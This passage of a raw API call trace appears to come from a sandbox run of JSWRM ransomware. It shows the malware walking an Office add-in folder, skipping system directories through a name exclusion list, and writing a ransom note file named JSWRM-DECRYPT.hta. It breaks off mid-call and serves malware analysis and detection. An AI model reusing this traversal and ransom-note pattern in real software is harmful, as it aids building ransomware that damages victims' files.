Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\fr\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x400b5b6a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0123.113] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.113] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x400b5b6a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.113] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.113] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.113] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x400b5b6a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x400b5b6a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x400b5b6a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.113] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.113] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.114] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.114] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.114] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.114] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.114] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.114] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.114] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.114] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0123.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0123.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0123.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0123.114] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6bad1cb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6bd3439, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x10040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.114] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.114] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.114] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.114] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.114] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.114] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.114] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.114] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.114] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.114] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245338 [0123.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.115] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4ba375b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4ba375b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.115] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.115] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.115] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.115] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.115] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.115] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.115] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.115] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.115] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.115] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0123.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0123.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0123.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0123.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0123.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245338 | out: hHeap=0x1e0000) returned 1 [0123.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.116] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x60db08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x34040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.116] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.116] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.116] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.116] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.116] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.116] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.116] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.116] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.116] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.116] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0123.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0123.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0123.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0123.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244840 [0123.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0123.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.116] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd42039, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd42039, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8faa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.116] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.116] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.116] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.116] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.116] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.116] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.117] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.117] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.117] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.117] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0123.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0123.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0123.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0123.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0123.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244840 | out: hHeap=0x1e0000) returned 1 [0123.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.117] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd42039, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd42039, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8faa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0123.117] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0123.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0123.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.117] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x675bda6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x675bda6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="gl", cAlternateFileName="")) returned 1 [0123.117] lstrcmpiW (lpString1="gl", lpString2=".") returned 1 [0123.117] lstrcmpiW (lpString1="gl", lpString2="..") returned 1 [0123.117] lstrcmpiW (lpString1="gl", lpString2="...") returned 1 [0123.117] lstrcmpiW (lpString1="gl", lpString2="windows") returned -1 [0123.117] lstrcmpiW (lpString1="gl", lpString2="recovery") returned -1 [0123.117] lstrcmpiW (lpString1="gl", lpString2="perflogs") returned -1 [0123.117] lstrcmpiW (lpString1="gl", lpString2="documents and settings") returned 1 [0123.117] lstrcmpiW (lpString1="gl", lpString2="$RECYCLE.BIN") returned 1 [0123.118] lstrcmpiW (lpString1="gl", lpString2="system volume information") returned -1 [0123.118] lstrcmpiW (lpString1="gl", lpString2="msocache") returned -1 [0123.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0123.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\gl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\gl\\jswrm-decrypt.hta")) returned 0xffffffff [0123.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0123.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0123.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0123.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0123.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\gl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\gl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.120] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.120] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: 